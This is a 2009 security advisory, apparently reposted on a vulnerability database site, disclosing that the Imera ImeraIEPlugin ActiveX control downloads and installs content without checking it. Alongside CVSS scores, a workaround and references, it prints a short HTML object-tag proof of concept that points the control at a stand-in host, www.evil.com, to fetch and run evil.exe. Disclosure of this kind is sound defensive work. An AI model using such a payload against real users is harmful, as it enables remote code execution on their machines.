Imera ImeraIEPlugin ActiveX Control Remote Code Execution

2009.03.04
Credit: Elazar Broad
Risk: High
Local: No
Remote: No
CWE: CWE-20


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Who: Imera(http://www.imera.com) Imera TeamLinks Client(http://teamlinks.imera.com/install.html) What: ImeraIEPlugin.dll Version 1.0.2.54 Dated 12/02/2008 {75CC8584-86D4-4A50-B976-AA72618322C6} http://teamlinks.imera.com/ImeraIEPlugin.cab How: This control is used to install the Imera TeamLinks Client package. The control fails to validate the content that it is to download and install is indeed the Imera TeamLinks Client software. Exploiting this issue is quite simple, like so: <object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6" id="obj"> <param name="DownloadProtocol" value="http" /> <param name="DownloadHost" value="www.evil.com" /> <param name="DownloadPort" value="80" /> <param name="DownloadURI" value="evil.exe" /> </object> Fix: The vendor has been notified. Workaround: Set the killbit for the affected control, see http://support.microsoft.com/kb/240797. Use the Java installer for TeamLinks Client or install the software manually from: http://teamlinks.imera.com/download.html Elazar -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQECAAYFAkmtR6YACgkQi04xwClgpZgbTgP/T3l+Gj+pIt19H80tiHrlbpbB7+qh /03/vQYTEL75n0XCmfGjbcurLhWlo+m90eDQwlgigq3CoQyqleKNI8kSDYjr2pw289Pm qC21ASe/P3zIM+gt81+iqDtKMA/MGvOE20nrHVEWlatAlCgmSjt3MJhqEJ/GdzUiR22s BDrpVM8= =R0h3 -----END PGP SIGNATURE-----

References:

http://xforce.iss.net/xforce/xfdb/49028
http://www.vupen.com/english/advisories/2009/0591
http://www.milw0rm.com/exploits/8144
http://secunia.com/advisories/34103


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top